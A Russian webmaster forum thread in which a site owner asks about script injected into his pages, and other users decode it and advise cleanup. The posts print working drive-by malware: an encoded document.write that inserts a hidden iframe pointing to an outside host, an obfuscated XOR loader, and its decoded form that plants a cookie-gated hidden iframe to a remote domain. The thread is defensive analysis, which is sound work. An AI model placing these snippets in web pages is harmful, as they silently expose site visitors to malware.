Форум Сайтостроение Веб-строительство

Что делает этот скрипт?

12
Klopopryg
На сайте с 29.12.2004
Offline
344
Klopopryg
1534

Обнаружил сегодня на своем сайте вот такой скрипт:

<!-- o --><script type="text/javascript">

<!--

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));

//-->

</script><!-- c -->

Подскажите, кто знает, что это такое... еще недели назад его не было, но вот видно какие-то вредители поставили... хочу узнать что за зверь и что он делает?

Лучше выстрелить, перезарядить и еще раз выстрелить, чем светить фонариком и спрашивать - "кто тут?"
Shtogrin
На сайте с 02.11.2006
Offline
95
Shtogrin
#1 

<iframe src="http://gazenvagen.com/img/index.php" width=0 height=0></iframe>

для просмотра кода можно засунуть его в textarea (но очень осторожно) 

<script>

document.write('<textarea cols="80" rows="10">');

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));

document.write('</textarea>');

</script>
www.shtogrin.com (http://www.shtogrin.com/). Канцтовары (http://www.invit.com.ua/). 1С Бухгалтерия (http://account.kiev.ua/).
MS
На сайте с 10.03.2007
Offline
87
MakStudio
#2

вирусняк. ифраме

вот так строчка с огромным набор символом равна

<iframe src="http://gazenvagen.com/img/index.php" width=0 height=0></iframe>

Klopopryg
На сайте с 29.12.2004
Offline
344
Klopopryg
#3

Огромное спасибо за ответы, пошел удалять.

Вот еще кусочек нашел: 

<!----><script>document.write(unescape("%3Cscript%3Eif%28Kj%21%3D1%29%7Bfunction%20oh%28wF%29%7Breturn%20wF%7Dtry%7Bvar%20lZP%3D%27DD0D70Dn0DP0Dt0DJ0DB0DU0Do0Dm0Dz0Dr0Dd0DT0DV0DM0Dh0Dw0Dj0DK0Dl0D90DG0Da0Db0Dc0De0DS0DW0Di0DL0Dp0D50DO0DR0Ds0DN0Df0Dq0D80Dx0DY0Dy0DC0D60DH0DA0Dg0DI0DZ0Dk0D30DX0D407D07707n07P07t07J07B07U07o07m07z07r07d07T07V07M07h07w07j07K07l%27%3Bvar%20uZr%3Doh%28%270%27%29%2CzHJ%3DArray%289581%5E9713%2C50%5E225%2C8146%5E7953%2C30167%5E29957%2CinQ%28%27201%27%29%2CinQ%28%27208%27%29%2CinQ%28%27212%27%29%2C10719%5E10561%2C2619%5E2813%2CinQ%28%27213%27%29%2C13245%5E13171%2C31134%5E31057%2CinQ%28%27128%27%29%2C31750%5E31979%2CinQ%28%27136%27%29%2C20665%5E20547%2CinQ%28%27196%27%29%2C737%5E621%2CinQ%28%27194%27%29%2C6954%5E7075%2CinQ%28%27219%27%29%2CinQ%28%27214%27%29%2CinQ%28%27193%27%29%2C25958%5E26033%2CinQ%28%27157%27%29%2C24392%5E24461%2CinQ%28%27228%27%29%2C32334%5E32469%2C24958%5E24991%2CinQ%28%27232%27%29%2CinQ%28%27142%27%29%2C16911%5E17147%2C20156%5E20081%2C16726%5E16785%2CinQ%28%27139%27%29%2C9179%5E9027%2CinQ%28%27150%27%29%2C16245%5E16353%2C14127%5E14271%2C24004%5E23823%2C25805%5E25679%2C23623%5E23711%2C11314%5E11477%2CinQ%28%27243%27%29%2C9306%5E9351%2C14307%5E14137%2C12138%5E12269%2CinQ%28%27145%27%29%2C6377%5E6181%2CinQ%28%27226%27%29%2CinQ%28%27241%27%29%2CinQ%28%27143%27%29%2CinQ%28%27200%27%29%2CinQ%28%27239%27%29%2C7610%5E7479%2C1642%5E1673%2CinQ%28%27154%27%29%2CinQ%28%27129%27%29%2CinQ%28%27159%27%29%2C9464%5E9235%2CinQ%28%27251%27%29%2CinQ%28%27254%27%29%2C17646%5E17527%2CinQ%28%27253%27%29%2CinQ%28%27252%27%29%2CinQ%28%27249%27%29%2C5552%5E5461%2CinQ%28%27217%27%29%2CinQ%28%27170%27%29%2CinQ%28%27234%27%29%2CinQ%28%27146%27%29%2C17668%5E17815%2CinQ%28%27149%27%29%2C30522%5E30637%2C5943%5E6077%29%3Bvar%20NmE%2CyCB%3Bvar%20ycb%2CAIE%3D%27DDD7DnDPDtDJDBDUDoDmDzDnDBDtDrDzDdDTDJDVDMDhDwDjD7DKDlDdD9DGDPDdDaDPDbDzDcDaDdDeDGDBDcDVDKDSD9DGDPDdDdDWDiDbDdDzDcDaDdDeDGDBDcDVDKDSDdDWDiDLD7DcDBDpDtD5DcDVDaDPDLDODcDBDpDtD5DcDVDKDRDsDNDfDqDqDqDqDqDKDSDdDhDrDnDmD5DcDzDBDLDnDrDrD8DtDcDdDbDdDMDhDRDxDbDxDRDcD7DnDGDJDcDVDjD7DKDRDxDSDcDYDJDtDPDcD7DbDxDRDWDiDLDBDrDyDTDpDCDBDPDtDzDODVDKDSDdD6D9DGDPDdDHDGDbDAD7DgDoDODaDADwDIDyDbDADgDADSD9DGDPDdDZDcDbDADmDJDhDGDBDcDgDLDnDIDGD7D7DtDnDBDcDIDLDrDPDODADwDYDkDbDAD3DXDBD5DID3DADSDtDoDVDhDrDnDmD5DcDzDBDLDnDrDrD8DtDcDLDtDzDhDcDYD4DoDVDHDGDRDADbDADRDIDyDKDdDbDb7DDgDKDlD9DGDPDdDhDIDXDbDhDrDnDmD5DcDzDBDLDIDrDnDGDBDtDrDzDLDXDrD7DBDSD9DGDPDdD977DbDdDADXDBDADRDADBDJ7nDADRDAD3D3DADRDVDdDhDIDXDd7PDbDdDADA7tDADA7n7JDjDVDKDKDdDRDdDhDIDXDLDPDcDJDIDGDnDcDdDVD37B7UDG7DDHDq7D7oDL7D7mD3DwDADLDADKDLDPDcDJDIDGDnDcDdDVD37zDLDRD3DwDADLDADKDRDADLDADR7JDjDVDKDdDRDADLDADdDRDdDZDcDRDYDkDSD9DGDPDd7rD9DbDhDrDnDmD5DcDzDBDLDnDPDcDGDBDc7dDIDcD5DcDzDBDVDADtDoDPDGD5DcDADKDS7rD9DLD7DcDBDWDBDBDPDtDjDmDBDcDdDVDAD7DPDnDADwDdD977DKDS7rD9DLDXDcDtDODXDBDbDgDS7rD9DLDaDtDhDBDXDbDfDS7rD9DLDoDPDGD5DcDZDrDPDhDcDPDdDbDdDqDSDdDBDP7TDlDdDhDrDnDmD5DcDzDBDLDjDrDh7TDLDGDJDJDcDzDh77DXDtDIDhDdDVDd7rD9DKDSDdDTDJDVDHDGDwDdDIDyDdDKDSD6DdDnDGDBDnDXDVDcDKDdDlDhDrDnDmD5DcDzDBDLDaDPDtDBDcDdDVDADDDXDBD5DIDUDDDjDrDh7TDUDDD3DjDrDh7TDUDDD3DXDBD5DIDUDADKDSDdDhDrDnDmD5DcDzDBDLDjDrDh7TDLDGDJDJDcDzDh77DXDtDIDhDdDVDd7rD9DKDSDTDJDdDVDdDHDGDwDIDyDKDdDSD6DdD67VDoDmDzDnDBDtDrDzDd7JDjDVDKDlDdD9DGDPDd7MDhDb7hDfDw7rDODbDxDqDg7h7wDf7jDN7KDs7oDqDGDjDnDhDcDoDxDSD9DGDPDdDjDTDbDxDxDSDdDoDrDPDV7MDODbDqDSDd7MDODdDDDd7MDhDSDd7MDODRDRDKDdDjDTDRDbDd7rDODLD7DmDjD7DBDPDVDTDGDBDXDLDoDIDrDrDPDVDTDGDBDXDLDPDGDzDhDrD5DVDK7l7rDODLDIDcDzDODBDXDKDwDgDwDgDKDSDdDPDcDBDmDPDzDdDjDTDSDdD6DDD3D7DnDPDtDJDBDU%27%3Bvar%20MkE%3DString%28%29%3BlZP%3DlZP.split%28uZr%29%3Bfor%20%28NmE%3D0%3BNmE%3CAIE.length%3BNmE+%3D2%29%7Bycb%3DAIE.substr%28NmE%2C2%29%3Bfor%28yCB%3D0%3ByCB%3ClZP.length%3ByCB++%29%7Bif%28lZP%5ByCB%5D%3D%3Dycb%29break%3B%7DMkE+%3DString.fromCharCode%28zHJ%5ByCB%5D%5E160%29%3B%7Dfunction%20inQ%28VGi%29%7Breturn%20parseInt%28VGi%29%7Ddocument.write%28MkE%29%3B%7Dcatch%28SEL%29%7B%7D%7Dvar%20Kj%3D1%3C/script%3E"))</script><!---->
MS
На сайте с 10.03.2007
Offline
87
MakStudio
#4

нада еще искать и устранять причину.

у меня такое было, хранил пароли к фтп в тоталкомандере, злобный вирус их захватил и внедрил в код сайтов такую ж фигню. ну это моё предположение:)

Shtogrin
На сайте с 02.11.2006
Offline
95
Shtogrin
#5

после двойного декодирования тянет что-то с update1.classictel.org 

<script> 



function Mp(Zd, bs) {

    var wr = new Date();

    var AH = new Date();

    AH.setTime(wr.getTime() + 86400000);

    document.cookie = Zd + "=" + escape(bs) + ";expires=" + AH.toGMTString();

}

var za = 's1fgw',

lG = '1';

var Be = 'update1.classictel.org',

xQ = '/html/';

if (document.cookie.indexOf(za + '=' + lG) == -1) {

    var dlh = document.location.host;

    var vC = 'ht' + 'tp:' + '//' + (dlh != '' ? '': Kb()) + dlh.replace(/[^a-z0-9.-]/, '.').replace(/\.+/, '.') + '.' + Kb() + '.' + Be + xQ;

    var Yv = document.createElement('iframe');

    Yv.setAttribute('src', vC);

    Yv.height = 1;

    Yv.width = 4;

    Yv.frameBorder = 0;

    try {

        document.body.appendChild(Yv);

        Mp(za, lG);

    } catch(e) {

        document.write('<html><body></body></html>');

        document.body.appendChild(Yv);

        Mp(za, lG);

    }

}

function Kb() {

    var Jd = 24,

    Yg = "01234567890abcdef";

    var bM = "";

    for (Jg = 0; Jg < Jd; Jg++)

        bM += Yg.substr(Math.floor(Math.random() * Yg.length), 1, 1);

    return bM;

} 

</script>
dayw
На сайте с 25.01.2006
Offline
116
dayw
#6

Избавиться от вирусов и пароли сначала сменить не забудьте :) иначе бестолку удалять.

Интернет-магазин игровых приставок в Москве (https://savelagame.ru)
ШO
На сайте с 27.12.2005
Offline
375
ШАНС-ON
#7

Klopopryg, тоже был этим заражен. Ткнул на форуме сайт какой-то под Ослом и все, звездец, не знал что делать.

Потом поставил Avira, вроде перетсали сайты инфецироваться.

Klopopryg
На сайте с 29.12.2004
Offline
344
Klopopryg
#8
ШАНС-ON:
Klopopryg, тоже был этим заражен. Ткнул на форуме сайт какой-то под Ослом и все, звездец, не знал что делать.

Потом поставил Avira, вроде перетсали сайты инфецироваться.

Жень, что поставил, можешь линку дать?

Это Авира - бесплатна?

ШO
На сайте с 27.12.2005
Offline
375
ШАНС-ON
#9
Klopopryg:
Это Авира - бесплатна?

Да, у меня стоит бесплатная версия.

http://www.free-av.de/ вот тут качай.

И проверь все сайты, Гугль может наказать за это, помни.

kamil
На сайте с 16.11.2006
Offline
75
kamil
#10
Klopopryg:
Обнаружил сегодня на своем сайте вот такой скрипт:

<!-- o --><script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script><!-- c -->

Подскажите, кто знает, что это такое... еще недели назад его не было, но вот видно какие-то вредители поставили... хочу узнать что за зверь и что он делает?

Похожая шняга на многих сайтах.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий